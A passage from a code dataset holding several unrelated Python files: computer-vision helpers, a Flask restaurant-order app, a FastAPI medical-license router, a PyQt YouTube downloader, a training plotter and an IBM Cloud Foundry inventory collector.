for _ in tnrange(examples):\n cameras_test = examplegenerator.generate()\n match_id = get_match_id(cameras_test)\n goods, bads = make_good_bad(cameras_test, match_id)\n good0 = goods[0]\n good1 = goods[1]\n bad0 = bads[0]\n bad1 = bads[1]\n\n eval_good_bad(good0, good1, clf, featuredataset,\n ddg, ddb, attribute_name)\n eval_good_bad(bad0, bad1, clf, featuredataset,\n ddb, ddg, attribute_name)\n\n return(ddg, ddb)\n\n\ndef make_work(fd_train, lessons, outcomes, items, label):\n \"\"\"\n makes a listing of work from chips for classification\n\n fd_train(featureDataset): training features\n lessons(list): feature vectors\n outcomes(list): expected outcome for the comparison\n items(list(chips)): list of chips for comparison\n label(int): expected label for the comparison\n \"\"\"\n workitems = itertools.permutations(items, 2)\n for workitem in workitems:\n item = glue(fd_train.get_feats_for_chip(\n workitem[0]), fd_train.get_feats_for_chip(workitem[1]))\n\n lessons.append(item)\n outcomes.append(label)\n\n item = glue(fd_train.get_feats_for_chip(\n workitem[1]), fd_train.get_feats_for_chip(workitem[0]))\n\n lessons.append(item)\n outcomes.append(label)\n","repo_name":"Lab41/pelops","sub_path":"pelops/analysis/comparecameras.py","file_name":"comparecameras.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"21"} +{"seq_id":"35972654852","text":"import json\n\nf = open(\"programs_eval.json\", 'r')\nw = open(\"pluginProperty.txt\", 'a')\n\nall_properties = []\nproperties = []\n\nfor line in f.readlines():\n dics = json.loads(line)\n for i in range(len(dics)):\n curr = []\n if isinstance(dics[i], dict):\n if dics[i]['type'] == 'Property':\n if 'value' in dics[i].keys():\n if dics[i]['value'] not in curr:\n curr.append((dics[i]['value']))\n if dics[i]['value'] in all_properties and dics[i]['value'] not in properties:\n w.write(str(dics[i]['value']))\n w.write('\\n')\n properties.append(dics[i]['value'])\n # all_properties.append(dics[i]['value'])\n else:\n all_properties.append(dics[i]['value'])\n all_properties += curr\n\n# for property in properties:\n# w.write(property)\n# w.write('\\n')","repo_name":"Wayne-Bai/Graph","sub_path":"Data-Processing/extractProperty.py","file_name":"extractProperty.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"8363049080","text":"import cv2\nimport numpy as np\n\ndef encode2Png(data, fileName):\n data=np.frombuffer(data, dtype=np.uint8)\n img=cv2.imdecode(data,cv2.IMREAD_COLOR)\n if cv2.imwrite(fileName,img):\n return fileName\n\ndef reEncode(fileName, afterName):\n cv2.imwrite(afterName, cv2.imread(fileName))\n\ndef transparent2white(fileName):\n data=cv2.imread(fileName, cv2.IMREAD_UNCHANGED)\n if data.shape[2]<4:\n return\n transMask=data[:,:,3]<255\n data[transMask]=(255,255,255,255)\n cv2.cvtColor(data,cv2.COLOR_BGRA2BGR,data)\n cv2.imwrite(fileName,data)\n\ndef padOut(fileName):\n def pad(base: np.ndarray):\n h,w,_=base.shape\n lrpad=max(0,(400-w)//2)\n udpad=max(0,(400-h)//2)\n if lrpad:\n sh=list(base.shape)\n sh[1]=lrpad\n base=np.concatenate([np.zeros(sh, dtype=np.uint8)+255, base, np.zeros(sh, dtype=np.uint8)+255], axis=1)\n if udpad:\n sh=list(base.shape)\n sh[0]=udpad\n base=np.concatenate([np.zeros(sh, dtype=np.uint8)+255, base, np.zeros(sh, dtype=np.uint8)+255], axis=0)\n return base\n \n def crop(base: np.ndarray):\n h,w,_=base.shape\n 
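# (editor's note) collapse RGB to the per-pixel channel minimum: a row or\n        # column counts as pure-white margin only when every pixel in it hits\n        # 255; the argmin calls below then find the first non-white row and\n        # column from each edge, i.e. the tight bounding box of the content.\n        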
nw=base.min(axis=2)\n fud=(nw.min(axis=1)==255).astype(np.uint8)\n flr=(nw.min(axis=0)==255).astype(np.uint8)\n ltip=flr.argmin()\n rtip=w-flr[::-1].argmin()\n utip=fud.argmin()\n dtip=h-fud[::-1].argmin()\n return base[utip:dtip, ltip:rtip]\n\n print(fileName)\n base=pad(crop(cv2.imread(fileName)))\n cv2.imwrite(fileName, base)\n","repo_name":"Howon-Shin/SaaS-font","sub_path":"fontmaker/imgProc.py","file_name":"imgProc.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17984708335","text":"#John Matukutire\n#11303324\n#CMPT 145 CRN 27177\n#L16\n\nimport Node as N\n\nclass Container(object):\n\n def __init__(self):\n \"\"\"\n Purpose\n creates an empty container\n \"\"\"\n self.__size = 0 # how many elements in the container\n self.__front = None # the node chain starts here\n self.__back = None # the node chain ends here\n\n\n def size(self):\n \"\"\"\n Purpose\n returns the number of data values in the container\n Return:\n The number of data values in the container\n \"\"\"\n return self.__size\n\n\n def is_empty(self):\n \"\"\"\n Purpose\n checks if the container has no data in it\n Return:\n True if the container has no data, or false otherwise\n \"\"\"\n return self.__size == 0\n\n\n def enqueue(self, value):\n \"\"\"\n Purpose\n adds the given data value to the container\n Pre-conditions:\n value: data to be added\n Post-condition:\n the value is added to the container\n Return:\n (none)\n \"\"\"\n new_node = N.node(value, None)\n\n if self.is_empty():\n self.__front = new_node\n self.__back = new_node\n else:\n prev_last_node = self.__back\n prev_last_node.set_next(new_node)\n self.__back = new_node\n\n self.__size += 1\n\n\n def dequeue(self):\n \"\"\"\n Purpose\n removes and returns a data value from the container\n Note: the container cannot be empty!\n Post-condition:\n the first value is removed from the container\n Return:\n the first value in the container, or None\n \"\"\"\n assert not self.is_empty(), 'dequeued an empty container'\n\n prev_first_node = self.__front\n result = prev_first_node.get_data()\n self.__front = prev_first_node.get_next()\n self.__size -= 1\n if self.__size == 0:\n self.__back = None\n return result\n\n\n def peek(self):\n \"\"\"\n Purpose\n returns the value from the front of the container\n without removing it\n Note: the container cannot be empty!\n Post-condition:\n None\n Return:\n the value at the front of the container\n \"\"\"\n assert not self.is_empty(), 'peeked into an empty container'\n\n first_node = self.__front\n result = first_node.get_data()\n return result\n\n\n def push(self, value):\n \"\"\"\n Purpose\n adds the given data value to the container\n Pre-conditions:\n value: data to be added\n Post-condition:\n the value is added to the container\n Return:\n (none)\n \"\"\"\n new_node = N.node(value, self.__front)\n self.__front = new_node\n self.__size += 1\n\n\n def pop(self):\n \"\"\"\n Purpose\n removes and returns a data value from the container.\n Note: the container cannot be empty!\n Post-condition:\n the first value is removed from the container\n Return:\n the first value in the container, or None\n \"\"\"\n assert not self.is_empty(), 'popped an empty container'\n\n prev_first_node = self.__front\n result = prev_first_node.get_data()\n self.__front = prev_first_node.get_next()\n self.__size -= 1\n return 
result\n","repo_name":"Matuxy79/asn10","sub_path":"a10q2_Container.py","file_name":"a10q2_Container.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73374838131","text":"from flask import Flask, render_template, request, redirect\nfrom flask_mysqldb import MySQL\n\napp = Flask(__name__)\n\n# Configurations for MySQL database connection.\napp.config['MYSQL_HOST'] = \"localhost\"\napp.config['MYSQL_USER'] = \"root\"\napp.config['MYSQL_PASSWORD'] = \"root\"\napp.config['MYSQL_DB'] = \"zomato_chronicles\"\n\n# Initialize the MySQL object with the Flask app.\nmysql = MySQL(app)\n\n# Homepage route, returning a welcome message.\n@app.route('/')\ndef index():\n return 'Welcome to Zomato Chronicles!'\n\n\n# Endpoint to create a new dish by sending a GET or POST request.\n@app.route('/dishes/create', methods=['GET', 'POST'])\ndef create_dish():\n # If the request is POST, retrieve form data, add the dish to the menu table, and redirect to the dish list.\n # Otherwise, return the HTML template for adding a new dish.\n if request.method == 'POST':\n dishId = request.form['id']\n name = request.form['name']\n price = request.form['price']\n availability = request.form['available']\n\n cur = mysql.connection.cursor()\n cur.execute(\"insert into menu (dishId, name, price, availability) values (%s, %s, %s, %s)\", (dishId, name, price, availability))\n mysql.connection.commit()\n cur.close()\n return redirect('/dishes')\n else:\n return render_template('add_dish.html')\n\n\n# Endpoint to list all dishes in the menu by sending a GET request.\n@app.route('/dishes', methods=['GET'])\ndef list_dishes():\n # Retrieve all dishes from the menu table and render the HTML template to display the list of dishes.\n cur = mysql.connection.cursor()\n allData = cur.execute(\"select * from menu\")\n if allData > 0:\n dishes = cur.fetchall()\n cur.close()\n return render_template('dishes.html', dishes=dishes)\n else:\n return render_template('error.html', error_message='Not found any dish in menu')\n\n\n# Endpoint to update a dish's availability by sending a GET or POST request with the dish_id.\n@app.route('/dishes/update/', methods=['GET', 'POST'])\ndef update_dish(dish_id):\n # If the request is POST, update the availability of the dish with the provided dish_id and redirect to the dish list.\n # Otherwise, return the HTML template to update the dish availability.\n cur = mysql.connection.cursor()\n data = cur.execute(\"select * from menu where dishId = %s\", (dish_id,))\n if data > 0:\n dish = cur.fetchone()\n else:\n return render_template('error.html', error_message='Not found dish in menu')\n\n if request.method == 'POST':\n available = request.form['available']\n cur.execute(\"UPDATE menu SET availability = %s WHERE dishId = %s\", (available, dish_id))\n mysql.connection.commit()\n cur.close()\n return redirect('/dishes')\n else:\n if int(dish[0]) == int(dish_id):\n return render_template('update_dish.html', dish=dish)\n\n\n# Endpoint to delete a dish from the menu by sending a GET request with the dish_id.\n@app.route('/dishes/delete/')\ndef delete_dish(dish_id):\n # Delete the dish with the provided dish_id from the menu table and redirect to the dish list.\n cur = mysql.connection.cursor()\n data = cur.execute(\"select * from menu where dishId = %s\", (dish_id,))\n if data > 0:\n dish = cur.fetchone()\n else:\n return render_template('error.html', error_message='Not found any dish in menu')\n\n 
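# (editor's note) the SELECT above only confirms the dish exists (its row\n    # is kept for the log print below); the DELETE itself is a parameterized\n    # query, so dish_id is never interpolated into the SQL string by hand.\n    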
cur.execute(\"DELETE FROM menu WHERE dishId = %s\", (dish_id,))\n mysql.connection.commit()\n cur.close()\n print(f\"deleted data -> {dish}\")\n return redirect('/dishes')\n\n\n# Endpoint to create a new order by sending a GET or POST request.\n@app.route('/orders/create', methods=['GET', 'POST'])\ndef create_order():\n # If the request is POST, retrieve form data, check the availability of the dish, add the order to the orders table,\n # and redirect to the order list. Otherwise, return the HTML template for creating a new order.\n if request.method == 'POST':\n orderId = request.form['orderId']\n customerName = request.form['customerName']\n dishId = request.form['dishId']\n status = request.form['status']\n\n cur = mysql.connection.cursor()\n data = cur.execute(\"SELECT * FROM menu WHERE dishId = %s\", (dishId,))\n if data > 0:\n dish = cur.fetchone()\n else:\n return render_template('error.html', error_message='Sorry, Not found dish')\n\n print(\"dish id \" + dishId)\n\n if dish[3] == \"yes\":\n cur.execute(\"INSERT INTO orders (orderId, customerName, dishId, status) VALUES (%s, %s, %s, %s)\", (orderId, customerName, dishId, status))\n mysql.connection.commit()\n cur.close()\n return redirect('/orders')\n else:\n cur.close()\n return render_template('error.html', error_message='Sorry, this dish is not available')\n else:\n return render_template('create_order.html')\n\n\n# Endpoint to update an order's status by sending a GET or POST request with the order_id.\n@app.route('/orders/update/', methods=['GET', 'POST'])\ndef update_order(order_id):\n # If the request is POST, update the status of the order with the provided order_id and redirect to the order list.\n # Otherwise, return the HTML template to update the order status.\n cur = mysql.connection.cursor()\n data = cur.execute(\"select * from orders where orderId = %s\", (order_id,))\n if data > 0:\n order = cur.fetchone()\n else:\n return render_template('error.html', error_message='Not found any dish in menu')\n\n if request.method == \"POST\":\n newStatus = request.form['status']\n cur.execute(\"UPDATE orders SET status = %s WHERE orderId = %s\", (newStatus, order_id))\n mysql.connection.commit()\n cur.close()\n return redirect('/orders')\n else:\n cur.close()\n return render_template('update_order.html', order=order)\n\n\n# Endpoint to list all orders by sending a GET request.\n@app.route('/orders', methods=['GET'])\ndef list_orders():\n # Retrieve all orders from the orders table and render the HTML template to display the list of orders.\n cur = mysql.connection.cursor()\n data = cur.execute(\"select * from orders\")\n if data > 0:\n orders = cur.fetchall()\n cur.close()\n return render_template('orders.html', orders=orders)\n else:\n cur.close()\n return render_template('error.html', error_message='Not found any dish in menu')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Murli0399/Zomato_Chronicles","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70918720052","text":"from fastapi import APIRouter, Depends, File, UploadFile\nfrom app.backend.db.database import get_db\nfrom sqlalchemy.orm import Session\nfrom app.backend.schemas import MedicalLicense, UpdateMedicalLicense, UserLogin, UploadMedicalLicense\nfrom app.backend.classes.medical_license_class import MedicalLicenseClass\nfrom app.backend.auth.auth_user import get_current_active_user\nfrom 
app.backend.classes.dropbox_class import DropboxClass\nfrom app.backend.classes.document_employee_class import DocumentEmployeeClass\nfrom app.backend.classes.document_type_class import DocumentTypeClass\nimport os\n\nmedical_licenses = APIRouter(\n prefix=\"/medical_licenses\",\n tags=[\"MedicalLicenses\"]\n)\n\n@medical_licenses.get(\"/\")\ndef index(session_user: UserLogin = Depends(get_current_active_user), db: Session = Depends(get_db)):\n data = MedicalLicenseClass(db).get_all()\n\n return {\"message\": data}\n\n@medical_licenses.post(\"/store\")\ndef store(form_data: MedicalLicense = Depends(MedicalLicense.as_form), support: UploadFile = File(...), session_user: UserLogin = Depends(get_current_active_user), db: Session = Depends(get_db)):\n document_type = DocumentTypeClass(db).get(\"id\", form_data.document_type_id)\n\n dropbox_client = DropboxClass(db)\n\n filename = dropbox_client.upload(name=str(form_data.rut), description=str(document_type.document_type), data=support,\n dropbox_path='/medical_licenses/', computer_path=os.path.join('C:\\\\', 'Users', 'jesus', 'OneDrive', 'Desktop', 'erpjis_fastapi', 'backend', 'app', 'backend'))\n \n document_employee_id = DocumentEmployeeClass(db).medical_license_store(form_data)\n\n DocumentEmployeeClass(db).update_file(document_employee_id, filename)\n\n data = MedicalLicenseClass(db).store(form_data, document_employee_id)\n\n return {\"message\": data}\n\n@medical_licenses.delete(\"/delete/{id}\")\ndef delete(id:int, session_user: UserLogin = Depends(get_current_active_user), db: Session = Depends(get_db)):\n medical_license = MedicalLicenseClass(db).get(\"id\", id, 1, 1, 1)\n document_employee = DocumentEmployeeClass(db).get('id', medical_license.document_employee_id)\n document_employee_response = DocumentEmployeeClass(db).delete(medical_license.document_employee_id)\n medical_license_response = MedicalLicenseClass(db).delete(id)\n\n if document_employee_response == 1 and medical_license_response == 1:\n if document_employee.support != None or document_employee.support != '':\n response = DropboxClass(db).delete('/medical_licenses/', document_employee.support)\n\n if response == 1:\n data = 1\n else:\n data = response\n else:\n data = 0\n \n return {\"message\": data}\n\n@medical_licenses.get(\"/edit/{rut}/{page}\")\ndef edit(rut:int, page:int = None, session_user: UserLogin = Depends(get_current_active_user), db: Session = Depends(get_db)):\n data = MedicalLicenseClass(db).get(\"rut\", rut, 2, page)\n\n return {\"message\": data}\n\n@medical_licenses.patch(\"/update/{id}\")\ndef update(id: int, medical_license: UpdateMedicalLicense, session_user: UserLogin = Depends(get_current_active_user), db: Session = Depends(get_db)):\n data = MedicalLicenseClass(db).update(id, medical_license)\n\n return {\"message\": data}\n\n@medical_licenses.get(\"/download/{id}\")\ndef download(id:int, session_user: UserLogin = Depends(get_current_active_user), db: Session = Depends(get_db)):\n data = MedicalLicenseClass(db).download(id)\n\n return {\"message\": data}\n\n@medical_licenses.post(\"/upload\")\ndef upload(form_data: UploadMedicalLicense = Depends(UploadMedicalLicense.as_form), support: UploadFile = File(...), session_user: UserLogin = Depends(get_current_active_user), db: Session = Depends(get_db)):\n dropbox_client = DropboxClass(db)\n\n filename = dropbox_client.upload(name=form_data.rut, description='contrato', data=support,\n dropbox_path='/medical_licenses/', computer_path=os.path.join('C:\\\\', 'Users', 'jesus', 'OneDrive', 'Desktop', 
'erpjis_fastapi', 'backend', 'app', 'backend'))\n \n medical_license = MedicalLicenseClass(db).get(\"id\", form_data.medical_license_id)\n data = DocumentEmployeeClass(db).update_file(medical_license.document_employee_id, filename)\n\n return {\"message\": data}\n","repo_name":"jisjesuscova/jisbackend","sub_path":"app/backend/routers/medical_licenses.py","file_name":"medical_licenses.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42949723911","text":"import matplotlib.pyplot as plt\nimport torch\n\nimport numpy as np\n\nfrom ..experimenter import e\n\n\nclass Plotter:\n \"\"\"\n Class used to save the plots graphs during training\n \"\"\"\n\n def __init__(self, file_path='plot.png'):\n self.n_heads = len(e.loss) if isinstance(e.loss, tuple) else 1\n self.file_path = file_path\n self.metrics_names = e['metrics_names']\n\n def on_validation_end(self, ev):\n history = ev['history']\n\n plt.clf()\n plt.figure(figsize=(6, 20))\n\n idxs = list(range(ev['history']['epoch'] + 1))\n\n for i in range(1 + self.n_heads * len(self.metrics_names)):\n train_values = history['train']['losses_summary'] if i == 0 else history['train']['metrics_summary'][i - 1]\n val_values = history['val']['losses_summary'] if i == 0 else history['val']['metrics_summary'][i - 1]\n\n ni = i - 1 - ((i - 1) // len(self.metrics_names)) * len(self.metrics_names)\n description = 'Loss ' if i == 0 else self.metrics_names[ni]\n if i > 0:\n train_values = [x.cpu() if torch.is_tensor(x) else x for x in train_values]\n\n ax = plt.subplot(1 + self.n_heads * len(self.metrics_names), 1, i + 1)\n\n plt.plot([t[0] for t in train_values], label='Train ' + description if 'val_loader' in e else description)\n ax.fill_between(idxs, [t[2] for t in train_values], [t[3] for t in train_values], alpha=0.2)\n\n if 'val_loader' in e:\n if i > 0:\n val_values = [x.cpu() if torch.is_tensor(x) else x for x in val_values]\n\n plt.plot([t[0] for t in val_values], label='Val ' + description)\n ax.fill_between(idxs, [t[0] - t[1] for t in val_values], [t[0] + t[1] for t in val_values], alpha=0.2)\n\n plt.ylabel(description)\n plt.legend()\n\n plt.savefig(e.out(self.file_path), dpi=150)\n plt.close()\n","repo_name":"danfergo/mpc-vitac","sub_path":"dfgiatk/experimenter/event_listeners/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22300662605","text":"from PyQt5.QtWidgets import QWidget\nimport sys\nimport pytube\n\n# from PyQt5.QtGui import QColor, QPalette\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, \\\n QLineEdit, QVBoxLayout, QPushButton, QTextEdit\n\n\n# use QColor.colorNames() to print out the colors strings\n# def set_widget_color(widget, color):\n# palette = widget.palette()\n# palette.setColor(QPalette.Window, QColor(color))\n# widget.setPalette(palette)\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Youtube Downloader By Mo\")\n self.resize(600, 300)\n\n self.input = QLineEdit()\n self.input.setPlaceholderText(\"Enter the Youtube link here\")\n self.input.setStyleSheet(\"\"\"\n background-color: #262626;\n color: #FFFFFF;\n font-family: Titillium;\n font-size: 18px;\n \"\"\")\n\n self.button = QPushButton()\n self.button.setText(\"Download\")\n self.button.setStyleSheet(\"\"\"\n background-color: #262626;\n color: #FFFFFF;\n font-family: 
Titillium;\n font-size: 18px;\n \"\"\")\n\n self.output = QTextEdit()\n self.output.setText(\"YouTube downloader Ready!\")\n self.output.setReadOnly(True)\n self.output.setStyleSheet(\"background-color:slategray;\")\n\n self.button.clicked.connect(self.download_video)\n\n layout = QVBoxLayout()\n layout.setSpacing(50)\n\n layout.addWidget(self.input)\n layout.addWidget(self.button)\n self.setCentralWidget(self.output)\n\n container = QWidget()\n container.setStyleSheet(\"background-color:gray;\")\n container.setLayout(layout)\n\n self.setMenuWidget(container)\n\n def download_video(self):\n self.output.setText(\"Downloading...\")\n QApplication.processEvents()\n url = self.input.text()\n\n if not url:\n self.output.setText(f\"URL Field is empty\")\n return\n\n try:\n yt = pytube.YouTube(url)\n except Exception as error:\n self.output.setText(f\"URL is not valid!\\n{error}\")\n return\n try:\n yt_object = yt.streams.get_highest_resolution()\n except Exception as error:\n self.output.setText(f\"could not get the required resolution of the video\\n{error}\")\n return\n try:\n yt_object.download('./videos')\n except Exception as error:\n self.output.setText(f\"ERROR: could not download the video\\n{error}\")\n return\n else:\n self.output.setText(\"Video is downloaded\")\n\n\napp = QApplication(sys.argv)\n\nwindow = MainWindow()\nwindow.show()\n\napp.exec()\n","repo_name":"Mokka68/videoDownloaderByMoe","sub_path":"pyqt-first-project.py","file_name":"pyqt-first-project.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37412103535","text":"import os\nimport glob\nimport cv2\nimport numpy as np\nimport random\nimport tensorflow as tf\n# from PIL import Image\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\ndef load_dataset(data_path = './dataset', norm=True):\n def normalize(data):\n # every image is composed of 96x96 cells containing values from 0 to 255 (RGB)\n # dividing by 255 we get values from 0 to 1, then subtract 0.5 to be close to 0\n data = (data / 255) - 0.5\n return data\n\n def load_data(mypath):\n # tensor where we put the data, no images now so 0\n # each image will be 96x96 with 3 layers RGB\n data = np.zeros((0, 150, 150, 3), dtype='uint8')\n labels = np.zeros((0,))\n for i, cla in enumerate(mypath):\n filelist = glob.glob(os.path.join(cla, '*')) # path of all images in folder cla\n tmp_data = np.empty((len(filelist), 150, 150, 3), dtype='uint8') # temp array where we store images\n tmp_labels = np.ones((len(filelist),)) * i # temp array where we store labels\n for j, path in enumerate(filelist):\n image = cv2.imread(path) # read each image getting a vector 96x96x3\n image = cv2.resize(image, (150, 150))\n tmp_data[j, :] = image # put it in the previous array\n data = np.concatenate((data, tmp_data))\n labels = np.concatenate((labels, tmp_labels))\n return data, labels\n\n train_path = glob.glob(os.path.join(data_path, 'train', '*')) # take path of training folders\n train_path.sort() # sort so we are sure that training and test folders are in same order\n print(train_path)\n test_path = glob.glob(os.path.join(data_path, 'test', '*'))\n test_path.sort()\n training_data, training_labels = load_data(train_path) # run function above to get images and labels\n test_data, test_labels = load_data(test_path)\n # perm = np.arange(training_data.shape[0]) # array containing test indices\n # random.shuffle(perm) # randomly shuffle the test data indices\n # 
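(editor's note) this commented-out block once carved a random 30% of the\n    # training images into the test split by shuffling the index array perm;\n    # sklearn.model_selection.train_test_split achieves the same in one call.\n    # 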
test_size = np.floor(training_data.shape[0]*0.3).astype(int)\n # perm = perm[:test_size] # take only the first 1000 (just because previously it was too big)\n # test_data = training_data[perm, :]\n # test_labels = training_labels[perm]\n # training_data = np.delete(training_data, perm, 0)\n # training_labels = np.delete(training_labels, perm, 0)\n if norm:\n training_data = normalize(training_data)\n test_data = normalize(test_data)\n return training_data, training_labels, test_data, test_labels\n\n\ndef augmentation(dataset, labels):\n datagen = ImageDataGenerator(\n rotation_range=20,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n vertical_flip=True,\n fill_mode='nearest')\n datagen.fit(dataset)\n\n aug_data = np.zeros((0, 150, 150, 3), dtype='uint8')\n temp_data = np.empty((9, 150, 150, 3), dtype='uint8')\n\n for data in dataset:\n data = np.expand_dims(data, axis=0)\n for i, image in enumerate(datagen.flow(data, batch_size=9)):\n temp_data[i, :] = image\n if i + 1 == 9:\n break\n aug_data = np.concatenate((aug_data, data, temp_data))\n\n aug_labels = np.repeat(labels, 10)\n\n return aug_data, aug_labels","repo_name":"kidist-amde/image-search-engine","sub_path":"CNN - Giulio/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24553131500","text":"# -------------------------------------------------------------------------------\r\n# Copyright IBM Corp. 2017\r\n# \r\n# Licensed under the Apache License, Version 2.0 (the 'License');\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n# \r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n# \r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an 'AS IS' BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n# -------------------------------------------------------------------------------\r\n\r\nimport json\r\nimport pandas as pd\r\nimport requests\r\nimport urllib\r\n\r\n\r\nclass Collector:\r\n def __init__(self, ibm_cloud_user_api_token=None, ibmid=None, password=None, **kwargs):\r\n\r\n if ibm_cloud_user_api_token is None and (ibmid is None or password is None):\r\n raise Exception('You must specify an IBM Cloud user api_token or an ibmid and password.')\r\n\r\n if ibm_cloud_user_api_token is not None:\r\n self.id = 'apikey'\r\n self.password = ibm_cloud_user_api_token\r\n else:\r\n self.id = ibmid\r\n self.password = password \r\n\r\n self.verbose = True # TODO\r\n\r\n self.base_URL = 'https://api.ng.bluemix.net{}'\r\n self.token = self.getAccessToken() # access token (including type, e.g. 
\"Bearer 012345\") or None\r\n\r\n\r\n self.cfdata = {\r\n 'organizations' : {},\r\n 'spaces': {},\r\n 'services': {}, # used for name lookup only\r\n 'service_plans': {}, # used for name lookup only\r\n 'service_instances': []\r\n }\r\n\r\n # validate credentials\r\n #print(self.config)\r\n\r\n def getAccessToken(self):\r\n \"\"\"\r\n Mint an access token using the provided id and password\r\n \"\"\"\r\n response = requests.get(self.base_URL.format('/info'))\r\n if response.status_code == 200:\r\n auth_endpoint = response.json()['authorization_endpoint'] + '/oauth/token'\r\n data = 'grant_type=password&username={0}&password={1}'.format(self.id, self.password)\r\n headers = {\r\n 'accept': 'application/json',\r\n 'content-type': 'application/x-www-form-urlencoded;charset=utf-8'\r\n }\r\n response = requests.post(auth_endpoint, data=data, headers=headers, auth=('cf', ''))\r\n if response.status_code == 200:\r\n results = response.json()\r\n return results['token_type'] + ' ' + results['access_token']\r\n else:\r\n raise Exception('Fatal error obtaining auth token. IBM Cloud returned {}.'.format(response))\r\n else:\r\n raise Exception('Fatal error obtaining auth token. IBM Cloud returned {}.'.format(response)) \r\n\r\n def collect(self):\r\n \"\"\"\r\n Collect information about Cloud Foundry service instances that the specified id has access to. Returns a Pandas DataFrame.\r\n \"\"\"\r\n\r\n self.cfdata['organizations'] = {}\r\n\r\n def fetch(url):\r\n http_headers = {\r\n 'accept': 'application/json',\r\n 'content-type': 'application/json',\r\n 'authorization': self.token\r\n }\r\n\r\n response = requests.get(self.base_URL.format(url), headers=http_headers)\r\n if response.status_code == 200:\r\n for resource in response.json().get('resources', []):\r\n self.cfdata['organizations'][resource['metadata']['guid']] = resource['entity']['name'] \r\n return response.json()['next_url']\r\n else:\r\n raise Exception('Fatal error retrieving organization list: {}'.format(response))\r\n\r\n # https://apidocs.cloudfoundry.org/280/services/list_all_services.html\r\n url = '/v2/organizations?results-per-page=100'\r\n\r\n while url is not None:\r\n if self.verbose: \r\n print('Searching for organizations...')\r\n url = fetch(url)\r\n\r\n\r\n \"\"\"\r\n load list of spaces that this id has access to\r\n \"\"\"\r\n\r\n self.cfdata['spaces'] = {}\r\n\r\n def fetch(url):\r\n http_headers = {\r\n 'accept': 'application/json',\r\n 'content-type': 'application/json',\r\n 'authorization': self.token\r\n }\r\n response = requests.get(self.base_URL.format(url), headers=http_headers)\r\n if response.status_code == 200:\r\n for resource in response.json().get('resources', []):\r\n self.cfdata['spaces'][resource['metadata']['guid']] = {\r\n 'space_name': resource['entity']['name'],\r\n 'org_guid': resource['entity']['organization_guid'],\r\n 'org_name': self.cfdata['organizations'][resource['entity']['organization_guid']]\r\n }\r\n return response.json()['next_url']\r\n else:\r\n raise Exception('Fatal error retrieving space list (GET {}): {}'.format(url, response))\r\n\r\n # https://apidocs.cloudfoundry.org/280/organizations/list_all_spaces_for_the_organization.html\r\n for org_guid in self.cfdata['organizations'].keys(): \r\n url = '/v2/organizations/{}/spaces?results-per-page=100'.format(org_guid)\r\n while url is not None:\r\n if self.verbose: \r\n print(' Searching for spaces in organization {}...'.format(self.cfdata['organizations'][org_guid]))\r\n url = fetch(url)\r\n\r\n\r\n \"\"\"\r\n load list of services 
(this is not user specific)\r\n\r\n \"\"\"\r\n\r\n self.cfdata['services'] = {}\r\n\r\n def fetch(url):\r\n http_headers = {\r\n 'accept': 'application/json',\r\n 'content-type': 'application/json',\r\n 'authorization': self.token\r\n }\r\n response = requests.get(self.base_URL.format(url), headers=http_headers)\r\n if response.status_code == 200:\r\n for resource in response.json().get('resources', []):\r\n self.cfdata['services'][resource['metadata']['guid']] = resource['entity']['label'] \r\n return response.json()['next_url']\r\n else:\r\n raise Exception('Fatal error retrieving service list (GET {}): {}'.format(url, response))\r\n\r\n # https://apidocs.cloudfoundry.org/280/services/list_all_services.html\r\n url = '/v2/services?results-per-page=100'\r\n\r\n while url is not None:\r\n url = fetch(url)\r\n\r\n\r\n \"\"\"\r\n load list of service plans (this is not user specific)\r\n\r\n \"\"\"\r\n\r\n self.cfdata['service_plans'] = {}\r\n\r\n def fetch(url):\r\n http_headers = {\r\n 'accept': 'application/json',\r\n 'content-type': 'application/json',\r\n 'authorization': self.token\r\n }\r\n response = requests.get(self.base_URL.format(url), headers=http_headers)\r\n if response.status_code == 200:\r\n for resource in response.json().get('resources', []):\r\n self.cfdata['service_plans'][resource['metadata']['guid']] = resource['entity']['name'] \r\n return response.json()['next_url'] \r\n else:\r\n raise Exception('Fatal error retrieving service plan information (GET {}): {}'.format(url, response))\r\n\r\n # https://apidocs.cloudfoundry.org/280/service_plans/list_all_service_plans.html\r\n url = '/v2/service_plans?results-per-page=100'\r\n\r\n while url is not None:\r\n url = fetch(url)\r\n\r\n\r\n \"\"\"\r\n load list of service instances that this id has access to\r\n\r\n \"\"\"\r\n\r\n self.cfdata['service_instances'] = []\r\n\r\n def 